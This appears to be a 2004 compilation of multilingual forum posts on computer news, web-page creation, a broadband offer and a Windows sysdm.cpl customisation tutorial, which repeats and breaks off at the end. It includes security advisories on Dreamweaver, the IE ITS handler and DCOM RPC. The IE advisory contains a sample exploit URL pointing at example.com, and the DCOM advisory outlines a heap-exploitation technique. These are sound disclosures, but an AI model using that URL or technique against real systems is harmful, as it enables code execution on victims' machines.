computer news

[atokENSEM]

Sun Manfaatkan Prosesor AMD dalam SunFire V20z

Sun Microsysytems Inc. baru-baru ini mengumumkan tersedianya sistem server barunya dengan harga yang diklaim lebih terjangkau. Sistem server yang bertipe SunFire V20z ini memanfaatkan prosesor Opteron AMD dan dijalankan menggunakan sistem operasi Solaris maupun Linux.

Menurut Bhra Eka Gunapriya (Presiden Direktur Sun Microsystem Indonesia), penggunaan prosesor AMD ini dirancang Sun sebagai implementasi penekanan biaya kepemilikan server. "Kami ingin menekankan bahwa TCO kini merupakan singkatan dari take cost out. Dengan memperkenalkan sistem server berbasis AMD yang dijalankan menggunakan Linux, faktor biaya mahal yang banyak dikeluhkan oleh para konsumen diharapkan dapat ditekan," papar Bhra.

Secara lebih jauh, dia menambahkan bahwa impelmentasi prosesor AMD ini merupakan sebagian dari inovasi baru yang dikerjakan Sun dalam rangka pengembangan program Network Computing 04 Q1. Inovasi-inovasi ini meliputi 13 solusi perangkat keras, 11 solusi perangkat lunak, dan 5 paket baru Reference Architecture & Solutions.

Robin Johnson (Senior Manager Product Management Sun Microsystems Asia South) menambahkan bahwa selain menggunakan prosesor AMD, Sun juga akan memperluas kerjasama dengan AMD dalam hal optimalisasi Solaris, Linux, dan Java agar bisa berjalan dengan baik di atas prosesor AMD. "Kami
juga mengupayakan tersedianya skalabilitas bagi prosesor Opteron selain berusaha mengimplementasikan teknologi HyperTransport," papar Robin.

Menurut Robin, penggunaan prosesor AMD ini akan memberikan beberapa keuntungan bagi pengguna, di antaranya kinerja yang meningkat dengan harga terjangkau, tersedianya komputasi 64-bit dengan
tetap menyediakan kompatibiltas bagi sistem berbasis 32-bit, dukungan terhadap sistem operasi Linux dan Solaris sesuai keinginan pengguna, dan adanya dukungan bagi aplikasi yang dibuat oleh pihak ketiga.

Penggunaan prosesor Opteron ini, menurut Sun, akan meningkatkan kinerja sistem sebesar 45 persen dibandingkan jika menggunakan prosesor lain. Dengan harga sekitar USS3.808, server SunFire V20z dapat menjalankan aneka aplikasi 32-bit dan 64-bit. Dengan demikian, aneka aplikasi termasuk Java
Enterprise System yang berjalan di atas Solaris dan Linux dapat berjalan dengan lancar dalam server ini. (rw)

[StRiDeR]

SUKARKAH mencipta laman web sendiri?

Bolehkah seseorang itu mencipta laman web sendiri sedangkan dia tidak pernah mengikut sebarang kursus komputer ataupun yang berkaitan dunia teknologi maklumat?

Jawapannya, kenapa pulak tidak boleh? Bagi saya, membuat laman web sendiri bukanlah sesuatu yang susah sangat. Saya berkata ia senang bukan kerana saya sudah biasa dengannya atau kerana sudah bertahun-tahun bergelumang dengan komputer, tetapi saya fikir ia seharusnya mudah kepada sesiapapun, walaupun kepada seorang kerani cabuk.

Jika anda tahu menggunakan komputer dan tahu menaip menggunakan apa-apa aplikasi di dalam Windows, itu sudah kira memadai untuk memulakan sebuah laman web persendirian.

Sebenarnya membuat laman web adalah semudah anda menaip di dalam Word. Perkara paling asas yang anda perlukan untuk mula menaipkan laman web anda ialah perisian yang sesuai.

Jika anda memasang perisian pelayar Internet Explorer versi 4.0 atau ke atas di dalam komputer, cuba anda perhatikan, bahawa terdapat satu perisian akan turut dipasang sama. Perisian itu ialah Frontpage Express, dengan ikon berwarna merah. Manakala jika anda memasang perisian pelayar Netscape Communicator versi 4.0 atau ke atas, anda akan diberikan perisian Netscape Composer.

Salah satu daripada dua perisian percuma ini sudah cukup untuk anda memulakan kerja anda. Taiplah macam biasa. Untuk masukkan gambar, klik pada menu yang sesuai dan anda akan diminta browse ke dalam cakera keras untuk mencari fail gambar tersebut. Akhir sekali simpan dokumen yang anda taip itu sebagai fail dengan sambungan *.htm atau *.html (tiada beza antara kedua-duanya).

Ini akan membolehkan dokumen yang anda taipkan itu disimpan sebagai sebuah fail HTML (Hyper Text Marked-up Language), iaitu format fail yang diperlukan di dalam Internet. Fail pertama laman web anda bolehlah dijadikan laman utama atau pintu masuk kepada laman-laman lain di dalamnya jika ada. Menaip satu laman utama yang panjang lebar dan berjela-jela bukan satu idea yang baik, ia akan menyebabkan pengguna atau pelayar yang ingin melayar akan terpaksa menunggu lama untuk lihat laman tersebut akibat kelajuan talian Internet yang perlahan.

Oleh yang demikian, pecahkannya kepada beberapa laman, iaitu simpan di dalam beberapa fail HTML yang berasingan. Anda boleh gunakan fail utama tadi untuk membuat pautan (link) kepada laman-laman yang lain. Sebelum membuat pautan, pastikan semua fail yang hendak dipaut itu sudah wujud.

Untuk membuat link, anda perlu pilih (highlight) teks yang dikehendaki dan kemudian ambil menu yang sesuai, bergantung kepada perisian yang anda guna. Sebagai Contoh, Frontpage menggunakan menu Insert > Hyperlink. Apabila ditanya, masukkan nama fail yang hendak dipautkan itu ataupun terus guna butang browse untuk mendapatkan fail berkenaan.

Banyak lagi fungsi-fungsi lain yang boleh anda buat menggunakan perisian-perisian itu termasuklah penggunaan jadual (table), garisan, perenggan dan lain-lain. Cubalah bermain-main dengan perisian itu untuk membiasakan diri dan akhir sekali menguasainya. Ular yang menyusur di celah-celah akar tidak akan hilang biasanya, tidak ada ruginya jika anda mencuba.

Secara konsepnya, sewaktu dalam proses membina laman web, kita turut perlu memikirkan beberapa perkara seperti kepada siapa laman web itu disediakan, bagaimana pengguna hendak bergerak dari satu laman ke laman yang lain, apakah grafik-grafik atau audio yang hendak diguna serta apakah pautan-pautan luar yang perlu dimasukkan untuk menjadikan kandungannya lebih bernilai.

Di dalam Internet, ada banyak laman web yang menyediakan bantuan yang lebih mendalam tentang bagaimana hendak membuat laman web dan akhir sekali menerbitkannya ke Internet untuk membolehkan ia ditonton oleh semua orang di seluruh dunia. Anda hanya perlu rajin mencari dan membacanya sahaja. Di kedai-kedai buku juga sudah ada beberapa buku berkenaan HTML dan lain-lain topik yang berkaitan dengan Internet yang di tulis atau diterjemah ke dalam Bahasa Melayu. Jika buku sukar didapati ataupun berharga mahal, layari sahaja Internet dan pelbagai bentuk maklumat boleh dicari untuk membantu kerja-kerja anda.

Perisian seperti FrontPage Express dan Netscape Composer adalah dua contoh perisian yang percuma dan mudah diguna. Banyak lagi perisian seperti ini boleh dipindah terima daripada Internet atau dibeli dari kedai untuk membantu anda. Bagaimanapun, jika anda ingin terus mencuba sesuatu yang baru, cubalah pelajari HTML, iaitu bahasa asas untuk semua laman web di Internet.

Selain dari memahami apa itu HTML dan cara mennyediakan dokumen HTML, untuk laman web, anda juga boleh mendapatkan pelbagai imej grafik seperti ikon, garisan dan sebagainya yang boleh dipindah terima dari beberapa tapak web d Internet seperti http//www.clipart.com ataupun www.corbis.com. Fail-fail grafik untuk laman web biasanya mestilah dalam format GIF (*.gif) atau JPEG (*.jpg).

Ringkasnya, jika anda rajin melayari Internet, banyak sumber rujukan boleh anda temui, yang boleh digunakan untuk anda membina sebuah laman web sendiri.

[StRiDeR]

Hundreds attempt to create instant supercomputer

SAN FRANCISCO: Hundreds of technophiles wired their computers together on Saturday in an attempt to generate computing power on a par with the world's strongest supercomputers.

The experiment, organised by researchers at the University of San Francisco (USF), was designed to determine whether a gymnasium full of off-the-shelf laptops and desktops networked together could muster enough power to process the most complex research problems.

Organisers failed to break into the ranks of the world's top 500 supercomputers as they had hoped, but said the event, which they called Flashmob I,'' was a success nonetheless.

Flashmob is about democratising supercomputing,'' said John Witchel, a graduate student at USF who co-developed the concept. It's about giving supercomputing power to the people so that we can decide how we want supercomputers to be used.''

Saturday's flashmob?event was a dry run designed to measure how much computing power could be generated, rather than tackle a specific task.

About 660 volunteers took part, including programmers, self-described Computer geeks,'' teenagers, college students and researchers. Cables connecting various laptops and desktops were strewn across the gym.

I just want to be part of history,'' said Glenn Montano, a USF senior majoring in computer science.

Organisers had hoped to break into the ranks of the world's top 500 supercomputers by generating more than 500 gigaflops of power. A powerful PC can generate about half a gigaflop. A Japanese computer that generates about 35,000 gigaflops holds the top spot.

Saturday's event managed to generate 180 gigaflops ?not enough to make the Top 500 list. Still, organisers said they were pleased. ?AP

[StRiDeR]

Flashmob I - Instant Super Computer
-----------------------------------------------

Kekawan,

Ringkasan cerita:

USF - Uni of San Fransisco telah menganjurkan satu gathering untuk community bersama-sama create super computer. Setiap org bawak PC sendiri, hook up to the network dan setup. Pastu run Linpack (benchmark).

Sebanyak 669 buah PC telah digunakan dan walaupun USF target untk match some comercial super comp di TOP500 list, cluster ni hanya berjaya mencatatkan paling tinggi 180 Gflops.

Berita penuh:
www.msnbc.msn.com/id/4661285/

Report dari USF:
www.flashmobcomputing.org/

TOP 500 list:
www.top500.org/

What do you think?
- should we use of the shelf components to build a cluster? pros? cons?
- any experience with cluster that you can share with?

[StRiDeR]

The following security advisory can be found at the SecuriTeam web site: www.securiteam.com



Macromedia Dreamweaver Remote Database Test Scripts Vulnerabilities
------------------------------------------------------------------------


SUMMARY

Macromedia's Dreamweaver is used to develop web sites and applications. To
aid in the development of web applications that require database
connectivity certain test scripts are created and uploaded to the website.
These scripts help to test database connectivity.

If left these scripts can allow an attacker to gain access to the backend
database server, without the attacker having to supply a user ID and
password.

DETAILS

Vulnerable Systems:
* Dreamweaver MX and UltraDev 4

To help test database connectivity when a web application is being
developed an ASP script, mmhttpdb.asp, is upload to the website. This
script can be accessed without and user ID or password and contains
numerous operations. One of these operations allows users to list all
Datasource Names defined on the web server. Another operation allows a
user running the script to issue SQL queries to the backend database
server.

Using the operations provided by the script, one could compromise the
server entirely. The vulnerable ASP script is usually uploaded to a
"_mmServerScripts" directory if using Dreamweaver MX or "_mmDBScripts"
directory if using Dreamweaver UltraDev. These directories should be
deleted on production systems. When combining this mis-configuration
vulnerability with other types of vulnerabilities such as directory
traversal, it becomes easily apparent how an attacker can gain access to
the test scripts.

Vendor Status:
Macromedia was alerted to this problem on the 10th of March, 2004 and has
since issued a security bulletin. Instructions for eliminating the
vulnerability can be found in Macromedia's advisory which can be found at
www.macromedia.com/devnet/security/security_zone/mpsb04-05.html.

[atokENSEM]

Intel Segera Ganti Nama Chip
Penulis: Lili

Skema penamaan mengedepankan feature, bukan sekadar clock speed.

infokomputer.com, Setelah bertahun-tahun menekankan clock speed sebagai ukuran kinerja yang lebih baik,Intel mengumumkan skema baru dalam pemberian nama prosesor buatannya. Fokusnya bukan lagi pada Megahertz atau Gigahertz.

Semua chip desktop dan mobile keluaran Intel di masa yang akan datang akan menggunakan nomor seri prosesor--300, 500 atau 700--berdasarkan brand family chip-nya. Misalnya, untuk desktop, chip Celeron yang terbaru akan masuk kelas 300 series, Pentium 4
500 series dan P4 Extreme Editions 700 series. Dalam setiap seri, raksasa chip asal Amerika Serikat ini akan membedakan setiap chip berdasarkan arsitektur, kecepatan clock, frontside bus, cache dan teknologi lainnya.

Skema penamaan baru ini dirancang untuk membantu pembeli membedakan chip berdasarkan semua featurenya, bukan sekadar clock speed, ujar Don MacDonald, Vice President Sales & Marketing Group saat pengumuman rencana baru ini. Apa sebabnya? Clock speed, lanjut MacDonald, bukan lagi cara terbaik untuk memilih prosesor yang tepat untuk tugas komputasi tertentu. "Satu matriks tidak bisa mendefinisikan ukuran kebaikan yang diterapkan setiap orang,"tambahnya.

Nomor-nomor seri tersebut pun bukan indikator tingkat atau level kinerja. "Kecuali jika Anda mendefinisi ulang arti kinerja," jelas MacDonald. Nama yang diberikan Intel pada setiap prosesor yang dibuatnya merupakan ringkasan dari feature-feature yang dikemaskan setiap produk. Gigahertz atau Megahertz tidak lagi banyak membantu konsumen, demikian menurut Intel.

[StRiDeR]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in Internet Explorer ITS Protocol Handler

Original release date: April 8, 2004
Last revised: --
Source: US-CERT

Systems Affected

* Microsoft Windows systems running Internet Explorer

Overview

A cross-domain scripting vulnerability in Microsoft Internet Explorer
(IE) could allow an attacker to execute arbitrary code with the
privileges of the user running IE. The attacker could also read and
manipulate data on web sites in other domains or zones.

I. Description

There is a cross-domain scripting vulnerability in the way ITS
protocol handlers determine the security domain of an HTML component
stored in a Compiled HTML Help (CHM) file. The HTML Help system
"...uses the underlying components of Microsoft Internet Explorer to
display help content. It supports HTML, ActiveX, Java, [and] scripting
languages (JScript, and Microsoft Visual Basic Scripting Edition)."
CHM files use the InfoTech Storage (ITS) format to store components
such as HTML files, graphic files, and ActiveX objects. IE provides
several protocol handlers that can access ITS files and individual CHM
components: its:, ms-its:, ms-itss:, and mk:@msitstore:. IE also has
the ability to access parts of MIME Encapsulation of Aggregate HTML
Documents (MHTML) using the mhtml: protocol handler.

When IE references an inaccessible or non-existent MHTML file using
the ITS and mhtml: protocols, the ITS protocol handlers can access a
CHM file from an alternate source. IE incorrectly treats the CHM file
as if it were in the same domain as the unavailable MHTML file. Using
a specially crafted URL, an attacker can cause arbitrary script in a
CHM file to be executed in a different domain, violating the
cross-domain security model.

Any programs that use the WebBrowser ActiveX control or the IE HTML
rendering engine (MSHTML) may be affected by this vulnerability.
Internet Explorer, Outlook, and Outlook Express are all examples of
such programs. Any programs, including other web browsers, that use
the IE protocol handlers (URL monikers) could function as attack
vectors. Also, due to the way that IE determines MIME types, HTML and
CHM files may not have the expected file name extensions (.htm/.html
and .chm respectively).

NOTE: Using an alternate web browser may not mitigate this
vulnerability. It may be possible for a web browser other than IE on a
Windows system to invoke IE to handle ITS protocol URLs.

US-CERT is tracking this issue as VU#323070. This reference number
corresponds to CVE candidate CAN-2004-0380.

II. Impact

By convincing a victim to view an HTML document such as a web page or
HTML email message, an attacker could execute script in a different
security domain than the one containing the attacker's document. By
causing script to be run in the Local Machine Zone, the attacker could
execute arbitrary code with the privileges of the user running IE. The
attacker could also read or modify data in other web sites (including
reading cookies or content and modifying or creating content).

Publicly available exploit code exists for this vulnerability. US-CERT
has monitored incident reports that indicate that this vulnerability
is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
BloodHound.Exploit.6 are some example of malicious code that exploit
this vulnerability. It is important to note that any arbitrary
executable payload could be delivered via this vulnerability, and
different anti-virus vendors may identify malicious code with
different names.

A malicious web site or email message may contain HTML similar to the
following:

ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl
oit_chm::exploit_html

(This URL is intentionally modified to avoid detection by
anti-virus software.)

In this example, HTML and script in exploit.html will be executed in
the security context of the Local Machine Zone. It is common practice
for exploit.html to either contain or download an executable payload
such as a backdoor, trojan horse, virus, bot, or other malicious code.

Note that it is possible to encode a URL in an attempt to bypass HTTP
content inspection or anti-virus software.

III. Solution

Currently, there is no complete solution for this vulnerability. Until
a patch is available, consider the workarounds listed below.
Disable ITS protocol handlers

Disabling ITS protocol handlers appears to prevent exploitation of
this vulnerability. Delete or rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it
ss,its,mk}

Disabling these protocol handlers will significantly reduce the
functionality of the Windows Help system and may have other unintended
consequences. Plan to undo these changes after patches have been
tested and installed. Follow good Internet security practices

These recommended security practices will help to reduce exposure to
attacks and mitigate the impact of cross-domain vulnerabilities.

* Disable Active scripting and ActiveX controls

NOTE: Disabling Active scripting and ActiveX controls will not
prevent the exploitation of this vulnerability.

Disabling Active scripting and ActiveX controls in the Internet
and Local Machine Zones may stop certain types of attacks and will
prevent exploitation of different cross-domain vulnerabilities.

Disable Active scripting and ActiveX controls in any zones used to
read HTML email.

Disabling Active scripting and ActiveX controls in the Local
Machine Zone will prevent malicious code that requires Active
scripting and ActiveX controls from running. Changing these
settings may reduce the functionality of scripts, applets, Windows
components, or other applications. See Microsoft Knowledge Base
Article 833633 for detailed information about security settings
for the Local Machine Zone. Note that Service Pack 2 for Windows
XP includes these changes.

* Do not follow unsolicited links

Do not click on unsolicited URLs received in email, instant
messages, web forums, or Internet relay chat (IRC) channels.

* Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify
and prevent some exploit attempts. Variations of exploits or
attack vectors may not be detected. Do not rely solely on
anti-virus software to defend against this vulnerability. More
information about viruses and anti-virus vendors is available on
the US-CERT Computer Virus Resources page.

Appendix B. References

* Vulnerability Note VU#323070 -
<http://www.kb.cert.org/vuls/id/323070>

* US-CERT Computer Virus Resources -
<http://www.us-cert.gov/other_sources/viruses.html>

* CVE CAN-2004-0380 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>

* Introduction to URL Security Zones -
<http://msdn.microsoft.com/workshop/security/szone/overview/overvi
ew.asp>

* About Cross-Frame Scripting and Security -
<http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec
urity.asp>

* MIME Type Determination in Internet Explorer -
<http://msdn.microsoft.com/workshop/networking/moniker/overview/ap
pendix_a.asp>

* URL Monikers -
<http://msdn.microsoft.com/workshop/networking/moniker/monikers.as
p>

* Asynchronous Pluggable Protocols -
<http://msdn.microsoft.com/workshop/networking/pluggable/pluggable
.asp>

* Microsoft HTML Help 1.4 SDK -
<http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta
rt.asp>

* Microsoft Knowledge Base Article 182569 -
<http://support.microsoft.com/default.aspx?scid=182569>

* Microsoft Knowledge Base Article 174360 -
<http://support.microsoft.com/default.aspx?scid=174360>

* Microsoft Knowledge Base Article 833633 -
<http://support.microsoft.com/default.aspx?scid=833633>

* Windows XP Service Pack 2 Technical Preview -
<http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.
mspx >

* AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
_________________________________________________________________

This vulnerability was reported by Thor Larholm.
_________________________________________________________________

Feedback can be directed to the author: Art Manion.
_________________________________________________________________

Copyright 2004 Carnegie Mellon University.

Terms of use:

<http://www.us-cert.gov/legal.html>

Revision History

April 8, 2004: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
sWme3VvhRbvk9KjNUNyTsbY=
=kL0G
-----END PGP SIGNATURE-----

[StRiDeR]

TIME Wireless Broadband : Ready to Go!

timebroadband.time.net.my/webbit/index.cfm

Time Wireless Broadband (PJ Area only)
Effective 9 April 2004, TIME WBA service commercially branded Webbit will be introduced to the market. The Webbit is viewed as one of the key elements in further penetrating the broadband market space as it provides an alternative to the physical copper last mile. The Webbit service enables TIME to gain the reach that was not previously available over the wired technology.

In addressing the public’s urgent request, the Wireless Broadband Access (WBA) service and packages will be positioned to achieve maximum market appeal with its unique characteristics that are defined as follows:


• High Speed Internet
The Webbit delivers speeds of up to 512kpbs. This higher bandwidth will increase the efficiency rate whilst enabling you to enjoy the multimedia rich online content, as you will not have to endure congested networks.

• Plug & Play
The Webbit is specially designed with the plug and play feature. This Plug and Play feature eliminates the long and tedious efforts of configuration, just adopt a Webbit, plug it into your pc and you are ready to experience the true broadband speeds.

• 24 hour Activation
With the Webbit service, you can walk into any of our authorised dealer outlets to subscribe for the service and obtain the service within 24 hours* of the application process.

*IP addresses will be issued on the next working day

• No cabling required
The Webbit utilises a state of the art digital wireless network to deliver superior broadband quality thus, it doesn't require any cabling works with the exception to the power cablings that is provided (standard 3 pin power socket).


• No Phone Lines
As the Webbit is delivered via a state of the art digital wireless broadband network and it is always on, instant connection service that doesn't require the dial-up technology, therefore phone lines are not required, saving on monthly phone rentals and call charges.

• Unlimited usage
The Webbit service is designed to best suit the consumer's needs. With the Webbit service plans, you can now surf the net minus the worries of keeping tract of the usage minutes. You can now surf 24 x 7 at one flat monthly fee.

• 24 x 7 Customer Service and Support Centre
A state of the art Webbit customer service and support centre can be accessed 24hours a day to answer your enquiries regarding the service. This centre is capable of providing you 1st and 2nd level troubleshooting capabilities to ensure maximum customer satisfaction.

2.0 Coverage Area

Webbit Phase 1 project will see the roll-out of service coverage to selected areas within the Petaling Jaya district. For further details on the coverage area, please logon to »triton.time.com.my/webbit

3.0 Product Packaging
Below are the packages and pricing put in place to cater for the various Internet needs of the residential and business customers with the consideration of the spending capabilities of the typical Malaysian household.

Basic*
Bandwidth Activation Monthly Fee IP Address Contract Period
384/256 RM99 RM69 Dynamic 1 Year
Basic Plus
Bandwidth Activation Monthly Fee IP Address Contract Period
448/256 RM99 RM89 Dynamic 1 Year


Premium*
Bandwidth Activation Monthly Fee IP Address Contract Period
512/256 RM120 RM259 1 1 Year
Premium Plus
Bandwidth Activation Monthly Fee IP Address Contract Period
512/256 RM120 RM299 5 1 Year
*Packages can be cross-sold

IP Address Upgrades - Only for Premium Subscribers
1 -5 RM40
5 -13 RM40
13- 29 RM40

For a subscriber to enjoy the above packages, they would need to purchase a Webbit Modem that is priced at RM 499.

4.0 Target Market
Initially, TIME will focus on two key market Internet usage trends comprising of the below:
i) Basic Users
This segment is mainly targeted to residential users, college students and Small Office Home Office (SoHo) users who utilise the Internet Broadband Connectivity for basic functions like surfing, emailing, web chatting and FTP. For users that hunger that extra edge in speed to enhance their gaming, web cam and streaming capabilities, the Basic + package will cater to their needs.
ii) Premium Users
This segment is mainly targeted toward the SMI / SME market that not only use
the Internet for surfing and emailing but also use the high bandwidth and IP
address capabilities for hosting of various service i.e. web hosting, email hosting
or FTP servers. For those with requirements for more IP addresses to serve
various Internet needs, the Premium Plus packages will cater to their
requirements.

Best regards,
Product Management
Wireless Broadband Access (WBA)

[atokENSEM]

.:: :: Mengenal System Properties Komputer :: ::.

Pernah melihat System Properties? Bukak Start -> Control Panel dan dalam tu ada System Properties, atau Right click ICON My Computer dan pilih Properties.
Perasan tak ada gambar macam Monitor/TV pada sudut atas sebelah kiri? Teringin nak menukarnya?


Biasanya orang akan tukar OEM logo pada bahagian bawah sebelah kiri (kalau anda punya tak ada,

just create satu gambar format BITMAP, dan save jadi oemlogo.bmp, dan simpan dalam SYSTEM folder anda, nanti gambar anda akan keluar.
Camana pulak nak tukar Gambar TV/Monitor kat System Properties tu?
Ok, sekarang ni apa-apa hal, sediakan satu imej dalam format bitmap terlebih dahulu (sama macam oemlogo.bmp tu pun boleh). Saya andaikan yang anda nak letak gambar yang sama seperti OEMINFO kat situ!
Kat dalam ni mesti ramai yang pernah dengar software Reshack atau Resource Hacker, betul? Siapa yang tak ada boleh download di SINI! Dan extract kan dia menjadi satu folder dan dah boleh guna, Click aje file ResHacker.exe tu. (Jangan bimbang, software ni VIRUS free... )

Kemudian cari fail Sysdm.cpl di dalam direktori C:WINDOWSSYSTEM kalau anda guna windows98, ME dan C:WINDOWSSYSTEM32 kalau ko guna windows 2000 dan XP. Search sahaja kalau susah sangat.
Bila dah jumpa;
1. Run Reshack.
2. Pergi menu FILE pada Reshack dan click OPEN
3. Cari fail sysdm.cpl dan open.
4. Sekarang ni anda akan nampak beberapa DIREKTORI di sebelah kiri pada Reshack tu, ada BITMAP, ICON, DIALOG dan sebagainya.
5. Click tanda + disebelah BITMAP tu (orang di UK panggil expand
6. Nampak folder "1"? Ok, Expandkan dia lagi ke bawah... dan anda akan nampak nombor 1033, OK click nombor tu!
Jen Jen Jeng! Nampak tak Imej Monitor tu sekarang? Itulah yang anda nak tukar, OK sekarang ni pulak cara nak replace imej tu;
1. Pegi pada MENU "Action" kat reshack dan amik "Replace Bitmap".
2. Dia akan keluar satu kotak, dan anda klik "open file with new bitmap..." dan select bitmap yang anda nak replace tu
3. Click butang "Replace"
Dan anda akan tengok MENU sebelah kiri tang BITMAP tu akan "Collapsed" (naik ke atas balik dan tanda + tu keluar). Taraaa! Gambar TV tadi tu dah pun bertukar!
Belum siap lagi tu!... sekarang ni pulak! kena save, tapi jangan save terus, pilih SAVE AS, dan letak kat tempat lain, letak jauh jauh, dalam drive D: ke apa ke...

Nak buat benda ni jadi, restart PC anda dan masa dia nak boot ke harddisk, cepat-cepat tekan F8, dan pilih:
1. Command Prompt only untuk windows98 dan ME.
2. Pilih Save Mode with Command Prompt untuk windows2000 dan XP

Sebab? file Sysdm.cpl tu adalah salah satu dari Windows File Protection dan dia tak kasi fail tu direplace, diubah ketika windows tengah beroperasi. Sebab tu kena pegi Safe Mode.
Bila dah masuk dalam command prompt, Just taip command ni -> copy C:WindowsyoursystemSysdm.cpl C:WindowsyoursystemSysdm.bak
dimana yang ni gunanya sebagai backup, mana la tahukan yang anda dah modified tu tak jadi plak!
(NOTA: %yoursystem% tu samada anda punya folder system, SYSTEM atau SYSTEM32)
OK, sekarang ni proses nak replace file original kepada file yang anda dah tukar. Pada command prompt taip aje -> copy X:Sysdm.cpl C:WINDOWSyoursystem (NOTA: X tu anda punya drive lain, atau kalau anda save dalam C:My Documents, jadilah macamni -> copy "C:My DocumentsSysdm.cpl" C:Windowsyoursystem)

Siap!, Restart balik PC anda supaya dia boot macam biasa, dan check anda punya System Properties!
Selamat Mencuba!

[StRiDeR]

Lindows, Microsoft wins round in name case

Lindows, a firm which markets a user-friendly version of the Linux operating system, has bowed to Microsoft in a lengthy dispute over its name.

The company said it would no longer be using the Lindows name - which Microsoft says undermines its Windows brand - outside the US. Lindows has faced a barrage of legal challenges from Microsoft over the past three years. It is already prevented from using its name in much of Europe.

Name game

Courts in Sweden, Finland and the Netherlands have ruled against the Lindows brand. And Microsoft wants Dutch authorities to fine the firm for not blocking internet users in the Benelux countries from accessing is website. Microsoft has filed similar action against Lindows in France, Spain, Canada and Mexico, as well as the US. Lindows has now conceded that it cannot keep the brand going outside the US, and says it will unveil a new international identity next week.

Source: BBC

[StRiDeR]

WARNING!!!

Microsoft DCOM RPC Race Condition

Release Date:
April 13, 2004

Date Reported:
September 10, 2003

Severity:
High (Remote Code Execution)

Vendor:
Microsoft

Systems Affected:
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Server 4.0
Microsoft Windows NT Server 4.0, Terminal Server Edition Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server 2003

Description:
eEye Digital Security has discovered a critical remote vulnerability in the way Microsoft Windows handles DCOM RPC requests. This vulnerability is a separate issue from vulnerabilities described in Microsoft Security Bulletins MS03-026 and MS03-039.

The RPC (Remote Procedure Call) protocol provides an inter-process communication mechanism allowing a program running on one computer to execute code on a remote system. Distributed COM (DCOM) extends the usability of COM to support COM communication across a network with other computers. The DCOM RPC interface in charge of processing incoming RPC based DCOM activation requests has been prone to failure in the past. An issue in the DCOM interface dealing with the processing of incoming activation requests can be exploited remotely to overwrite heap memory and gain control of the vulnerable RPC server with SYSTEM level privileges.

Technical Description:
The Activation class of functions within the RPCSS module are designed to process incoming DCOM activation requests so that the instance can be delivered to the requesting agent. An exploitable race condition can be produced by initiating two activation requests simultaneously, and then quickly closing the connection. The window of opportunity to produce this condition is very slim so multiple parallel requests will usually be required to produce this condition. Producing this condition will cause a small amount of corruption within the svchost rpc service process heap.

Due to the volatile nature of this vulnerability several different objects may be overwritten depending on the block the memory management supplies us. We can increase the rate of success by altering the size of our request so that a less populated block pool is chosen.

Navigating to a desired payload proved difficult because of the fact that several different objects could be overwritten depending on what block we overwrite. Given we couldn’t supply a general purpose return address that met each of conditions we observed, we combined this issue with the memory leak released in unison with this advisory. Using the memory leak we can inject a payload into the process heap and it will reside there inevitably. Unfortunately due to the nature of the Windows heap an address cannot easily be predicted without access to the private heap environment.

When a request is made to the memory management for a block 30000 bytes in size, the memory management system will page in virtual memory, skipping the private heap and its blocks. The memory management system will locate an unused area of the process address space with enough space for our requested memory. By supplying an irregularly large size with our allocation we can force the memory management system to supply us with memory at an address that is predictable. It should be noted that this technique may not be reliable across image versions due to the dramatic changes in the address space.

Protection:
Retina Network Security Scanner has been updated to identify this vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is available at: www.microsoft.com/technet/security/bulletin/MS04-012.mspx.

Credit:
Discovery: Riley Hassell
Additional Research: Derek Soeder and Barnaby Jack.

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert-at-eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security

[atokENSEM]

.:: :: Mengenal System Properties Komputer :: ::.

Pernah melihat System Properties? Bukak Start -> Control Panel dan dalam tu ada System Properties, atau Right click ICON My Computer dan pilih Properties.
Perasan tak ada gambar macam Monitor/TV pada sudut atas sebelah kiri? Teringin nak menukarnya?


Biasanya orang akan tukar OEM logo pada bahagian bawah sebelah kiri (kalau anda punya tak ada,

just create satu gambar format BITMAP, dan save jadi oemlogo.bmp, dan simpan dalam SYSTEM folder anda, nanti gambar anda akan keluar.
Camana pulak nak tukar Gambar TV/Monitor kat System Properties tu?
Ok, sekarang ni apa-apa hal, sediakan satu imej dalam format bitmap terlebih dahulu (sama macam oemlogo.bmp tu pun boleh). Saya andaikan yang anda nak letak gambar yang sama seperti OEMINFO kat situ!
Kat dalam ni mesti ramai yang pernah dengar software Reshack atau Resource Hacker, betul? Siapa yang tak ada boleh download di SINI! Dan extract kan dia menjadi satu folder dan dah boleh guna, Click aje file ResHacker.exe tu. (Jangan bimbang, software ni VIRUS free... )

Kemudian cari fail Sysdm.cpl di dalam direktori C:WINDOWSSYSTEM kalau anda guna windows98, ME dan C:WINDOWSSYSTEM32 kalau ko guna windows 2000 dan XP. Search sahaja kalau susah sangat.
Bila dah jumpa;
1. Run Reshack.
2. Pergi menu FILE pada Reshack dan click OPEN
3. Cari fail sysdm.cpl dan open.
4. Sekarang ni anda akan nampak beberapa DIREKTORI di sebelah kiri pada Reshack tu, ada BITMAP, ICON, DIALOG dan sebagainya.
5. Click tanda + disebelah BITMAP tu (orang di UK panggil expand
